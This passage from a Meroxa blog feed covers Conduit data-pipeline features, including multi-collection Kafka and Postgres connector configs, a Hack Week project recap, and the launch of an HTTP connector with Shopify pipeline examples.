  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Route record to topic based on record metadata field &quot;opencdc.collection&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;In the case of configuring a Postgres connector as a source, we expanded support to reading from multiple tables in the two CDC modes (logical replication and long polling) using the &lt;code class=&quot;language-text&quot;&gt;tables&lt;/code&gt; configuration option indicating the tables you would like to read from comma separated.&lt;/p&gt;
&lt;p&gt;Additionally, we have also added the ability to read all tables from a public schema using a wildcard option (*). We believe this option will come in handy in the following situations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Initial data ingestion:&lt;/strong&gt; this way you’ll ensure the connector will capture all available tables, reducing the setup time and ensuring no tables are missed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema changes:&lt;/strong&gt; if new tables are added, the connector will automatically pick up new tables eliminating the need for manual updates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data discovery:&lt;/strong&gt; this can be helpful to facilitate data discovery detecting changes from all tables, which can be useful when exploring a new data source.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reducing maint&lt;/strong&gt;e&lt;strong&gt;nance:&lt;/strong&gt;  the need to maintain a list of specific tables is eliminated, making the maintenance of the connector easier.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here’s an example of a pipeline configuration file using &lt;strong&gt;Postgres as a source:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; * &lt;span class=&quot;token comment&quot;&gt;# All tables in schema &apos;public&apos;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:password@localhost:5432/exampledb&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As with our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;, the &lt;strong&gt;Postgres destination&lt;/strong&gt;, defaults to setting the destination table as the value of the &lt;code class=&quot;language-text&quot;&gt;opencdc.collection&lt;/code&gt; metadata field. This can also be customized if you need to. Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Route record to table based on record metadata field &quot;opencdc.collection&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:password@localhost:5432/exampledb&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;Generator connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Multiple collections support in the generator enables the generator to emit records with different formats. For example, let’s assume we want to simulate reading from two collections. One contains data about users and the other data about orders. With the generator, that can be accomplished using the following configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Global settings&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1000&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;users&quot; produces structured records with fields &quot;id&quot; and &quot;name&quot;.&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# All user records have the operation &apos;create&apos;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.operations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; create
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;orders&quot; produces raw records with fields &quot;id&quot; and &quot;product&quot;.&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Order records have one of the specified operations chosen randomly.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.product&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.operations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; create&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;update&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;delete&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;📝 One of the new features is to generate different operations for each record!&lt;/p&gt;
&lt;h2&gt;Bonus: Dynamic configuration parameters in connectors&lt;/h2&gt;
&lt;p&gt;With the latest release of the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;, we introduced dynamic configuration parameters. A configuration parameter can now contain a wildcard in its name (&lt;code class=&quot;language-text&quot;&gt;*&lt;/code&gt;), which can be filled out in the pipeline configuration provided by the user.&lt;/p&gt;
&lt;p&gt;We already use this feature in the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; connector to specify multiple collections with separate formats. For instance, the configuration parameter &lt;code class=&quot;language-text&quot;&gt;collections.*.format.type&lt;/code&gt; can be provided multiple times, where &lt;code class=&quot;language-text&quot;&gt;*&lt;/code&gt; is replaced with the collection name. We also use it to configure a list of fields generated by the connector using the parameter &lt;code class=&quot;language-text&quot;&gt;collections.*.format.options.*&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Global settings&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1000&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;users&quot; produces structured records with fields &quot;id&quot; and &quot;name&quot;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;orders&quot; produces raw records with fields &quot;id&quot; and &quot;product&quot;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.product&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can start using this feature in your own connectors right away!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;We’d love your feedback!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.10.0&quot;&gt;Conduit Changelog&lt;/a&gt;. What do you think about multiple collections and dynamic configuration parameters? Is there something you think would be great to have in Conduit? Start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussion&lt;/a&gt;, join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, or reach out via &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Inside Meroxa’s Hack Week: Pioneering Data Solutions with In-House Innovation]]></title><description><![CDATA[Discover the excitement of Hackweek! Dive into our latest blog post to explore innovative projects and creative breakthroughs from our most recent Hackweek. Learn how teams collaborate to turn bold ideas into reality, fostering a culture of innovation. Perfect for tech enthusiasts and creative thinkers alike!]]></description><link>https://meroxa.com/blog/inside-meroxas-hack-week-pioneering-data-solutions-with-in-house-innovation</link><guid isPermaLink="false">https://meroxa.com/blog/inside-meroxas-hack-week-pioneering-data-solutions-with-in-house-innovation</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 17 Apr 2024 04:38:15 GMT</pubDate><content:encoded>&lt;p&gt;Welcome to an insider’s view of Meroxa’s Hack Week, a time when our development team showcases its innovative prowess by utilizing our comprehensive data platform. This tradition not only highlights our team’s dedication to our product but also demonstrates the extensive possibilities that Meroxa unlocks for data ingestion, transformation, streaming, and orchestration.&lt;/p&gt;
&lt;h3&gt;The Essence of Hack Week at Meroxa&lt;/h3&gt;
&lt;p&gt;Hack Week at Meroxa is a celebration of our ability to blend technical expertise with creative innovation, developing applications that extend beyond our standard offerings. It is a period of intense exploration, learning, and boundary-pushing, which ultimately enhances our platform&apos;s capabilities.&lt;/p&gt;
&lt;h3&gt;Showcasing This Quarter’s Innovative Projects&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Conduit Connector Kafka Broker&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A standout project by Lovro introduced an experimental Kafka broker connector, enhancing our data integration capabilities by enabling direct data production from Kafka producers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disaster Recovery with Litestream&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Samir’s initiative started with scaling Pocketbase and evolved into utilizing Litestream for cutting-edge disaster recovery solutions, exemplifying Meroxa’s flexibility.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generic HTTP Connector for Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Maha identified and filled a crucial gap in our service offerings by developing a production-grade HTTP source and destination connector for Conduit, significantly advancing our connectivity solutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Google Contacts Backup Tool&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Leveraging the new HTTP connector, Haris developed a tool for backing up Google Contacts, illustrating the practical applications of Meroxa’s platform for everyday data management challenges.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Realtime MLOps with Milvus and WASM Vector Embedding Processor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;James used our Conduit Connector and Processor SDKs to build a real-time MLOps pipeline that transforms Postgres data into vector embeddings, showcasing the platform’s support for sophisticated data operations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Facilitating Customer Proof of Concept Demos&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Anna’s work on tailored demos for Clickhouse integration to Google Pub/Sub and Snowflake to Hubspot demonstrates Meroxa’s capability in simplifying data movement, essential for reverse ETL processes and aiding sales efforts.&lt;/p&gt;
&lt;h3&gt;Inspiring the Future of Data Innovation&lt;/h3&gt;
&lt;p&gt;As we reflect on the achievements of this quarter’s Hack Week, we are inspired by the limitless possibilities within Meroxa. The projects highlighted are a source of inspiration for anyone looking to push the boundaries of data technology.&lt;/p&gt;
&lt;p&gt;Whether you are starting your data journey or looking to enhance your expertise, we invite you to sign up for a demo or join our Discord community to see how Meroxa is leading innovation in data solutions. Embrace the future of data with Meroxa and discover how our platform can empower your next project. Here’s to continuing to innovate and redefine the boundaries of what’s possible with data!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1712530846514.1712964674930.42&amp;#x26;__hssc=259081301.1.1712964674930&amp;#x26;__hsfp=754967255&quot;&gt;Sign Up for a Demo&lt;/a&gt; | Join Our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; Community&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing the New HTTP Connector for Conduit: Streamline Your Data Flow]]></title><description><![CDATA[Explore the capabilities of Meroxa's Conduit HTTP Connector, a robust tool designed to enhance data integration by facilitating seamless communication with any API endpoint. Perfect for developers and enterprises looking to streamline data workflows and maximize connectivity. Discover how our HTTP Connector can transform your data management strategy.]]></description><link>https://meroxa.com/blog/introducing-the-new-http-connector-for-conduit-streamline-your-data-flow</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-the-new-http-connector-for-conduit-streamline-your-data-flow</guid><dc:creator><![CDATA[Maha Hajja]]></dc:creator><pubDate>Fri, 12 Apr 2024 23:44:02 GMT</pubDate><content:encoded>&lt;p&gt;In the evolving landscape of data integration, staying ahead means continuously enhancing the versatility and effectiveness of our tools. That’s why we’re thrilled to announce the latest addition to Conduit: the HTTP Connector. This powerful &lt;a href=&quot;https://conduit.io/docs/introduction/vocabulary/#:~:text=around%20(destination%20connector).-,Connector%20plugin,-%2D%20sometimes%20also%20referred&quot;&gt;plugin&lt;/a&gt; not only broadens the scope of Conduit’s capabilities but also simplifies the process of pulling and pushing data over HTTP.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Why the HTTP Connector?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A generic HTTP connector allows you to connect to any HTTP-based service or API. This flexibility is essential in modern software development, where systems often need to communicate with a wide range of external services, from internal APIs to third-party platforms.&lt;/p&gt;
&lt;p&gt;By having both the HTTP source and destination connectors, you gain the ability to effortlessly transfer data between any Conduit source connector to an HTTP endpoint, and vice versa.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Building and Testing Made Simple&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Developed with ease of use in mind, building and testing the HTTP Connector is straightforward:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Download or Build&lt;/strong&gt;: Download the connector’s &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http/releases/tag/v0.1.0&quot;&gt;release binary file&lt;/a&gt; that is ready to use, or use the simple &lt;code class=&quot;language-text&quot;&gt;make build&lt;/code&gt; command that compiles the connector from source, preparing it for integration into your Conduit pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Testing&lt;/strong&gt;: With &lt;code class=&quot;language-text&quot;&gt;make test&lt;/code&gt;, you can run through all the unit tests to ensure the connector functions correctly.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Source Connector: How It Works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The source side of the HTTP Connector pulls data at regular intervals specified by the &lt;code class=&quot;language-text&quot;&gt;pollingPeriod&lt;/code&gt;. It’s smartly designed to enhance flexibility, allowing you to specify request methods (GET, HEAD, OPTIONS), headers, and parameters to tailor the data request to your needs. Particularly noteworthy is the use of the OPTIONS method, which appends the returned options directly to the record&apos;s metadata, enriching the data ingested into Conduit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration options&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;URL&lt;/strong&gt;: The endpoint from which data is fetched.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Method&lt;/strong&gt;: Choose from GET, HEAD, or OPTIONS to match the endpoint’s requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Headers&lt;/strong&gt; and &lt;strong&gt;Params&lt;/strong&gt;: Further customize your requests.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Polling Period&lt;/strong&gt;: Set how frequently the connector fetches data, with a default of every 5 minutes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Using the HTTP source connector, you can pull data from any HTTP API and push it to any Conduit destination connector, check our &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/#connector-types&quot;&gt;Conduit connectors list&lt;/a&gt;. Let’s take for example a pipeline that pulls orders from Shopify and pushes them into a file destination connector:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pipeline Configuration File&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create a folder called &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; at the same level as your Conduit binary. Inside of that folder create a yaml file and copy these configurations over.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2  pipelines:    - id: shopify-pipeline      status: running      connectors:        - id: shopify-orders          type: source          plugin: standalone:http          settings:            url: &amp;lt;https://cd8206-5c.myshopify.com/admin/api/2024-04/orders.json&gt; # your shopify API to get orders.            headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.            pollingPeriod: 30m # pull data from the URL every 30 minutes.        - id: file-dest          type: destination          plugin: builtin:file          settings:            path: orders.txt      processors:         - id: decode-response          # use a builtin processor that decodes the pulled data into JSON.          plugin: json.decode           settings:            field: .Payload.After  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now run Conduit using &lt;code class=&quot;language-text&quot;&gt;./conduit&lt;/code&gt;, and see the magic!&lt;/p&gt;
&lt;p&gt;This pipeline will pull the Shopify orders from the API every 30 minutes, parse the response into JSON, and then write the orders into the destination file.&lt;/p&gt;
&lt;p&gt;Check &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;Pipeline Configuration Files&lt;/a&gt; for more details around the pipeline configuration files and how to run them.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Destination Connector: Pushing Data Forward&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;On the flip side, the destination connector takes data processed in Conduit and pushes it to the specified HTTP endpoint. Like its source counterpart, it allows for detailed configuration, including request methods suitable for creating or modifying resources (POST, PUT, DELETE, PATCH). This opens up a myriad of possibilities for integrating with APIs across the web.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration options&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;URL&lt;/strong&gt;: The endpoint to which data is sent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Method&lt;/strong&gt;: Supported methods include POST, PUT, DELETE, and PATCH, providing flexibility based on the API’s requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Body Manipulation&lt;/strong&gt;: Through Conduit&apos;s &lt;a href=&quot;https://conduit.io/docs/processors/builtin/&quot;&gt;built-in&lt;/a&gt; or &lt;a href=&quot;https://conduit.io/docs/processors/standalone/&quot;&gt;standalone&lt;/a&gt; processors, customize the data format to fit the destination&apos;s needs perfectly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Using the HTTP destination connector, you can pull data from any Conduit source connector and push it to an HTTP API, check our &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/#connector-types&quot;&gt;Conduit connectors list&lt;/a&gt;. Let’s take for example a pipeline that pulls orders from a Generator source connector and pushes them into the Shopify API to add products:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pipeline Configuration File&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create a folder called &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; at the same level as your Conduit binary. Inside of that folder create a yaml file and copy these configurations over.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2  pipelines:    - id: shopify-pipeline      status: running      connectors:        - id: generator-src          type: source          plugin: builtin:generator          settings:            format.type: structured            format.options: &quot;title:string,body_html:string,vendor:string,product_type:string,status:string&quot;            readTime: 1m # generate a new product every minute.        - id: shopify-products          type: destination          plugin: standalone:http          settings:            url: &amp;lt;https://cd8206-5c.myshopify.com/admin/api/2024-04/products.json&gt; # your shopify API to add products.            headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Run Conduit using &lt;code class=&quot;language-text&quot;&gt;./conduit&lt;/code&gt; as we did in the last example, and notice the new products generated by the source and pushed to Shopify. Check &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;Pipeline Configuration Files&lt;/a&gt; for more details.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Seamless Integration with Your Data Ecosystem&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The HTTP Connector is more than just a plugin; it’s a gateway to integrating a vast array of web services and APIs directly into your data pipelines. Whether you’re aggregating data from multiple sources for analysis or updating external systems with processed data, the HTTP Connector streamlines these interactions, making your data workflows more efficient and effective.&lt;/p&gt;
&lt;p&gt;We invite you to explore the &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http&quot;&gt;HTTP Connector&lt;/a&gt; and see firsthand how it can transform your data integration strategies. For more details about Conduit, visit our &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http/tree/maha/destination&quot;&gt;Conduit’s GitHub page&lt;/a&gt;. To get in touch join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;discord&lt;/a&gt; channel and let us know if you have any questions.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates as we continue to enhance Conduit, making it the most versatile and user-friendly data integration platform available. &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1712530846514.1712964674930.42&amp;#x26;__hssc=259081301.1.1712964674930&amp;#x26;__hsfp=754967255&quot;&gt;Sign up for a demo&lt;/a&gt;.&lt;/p&gt;
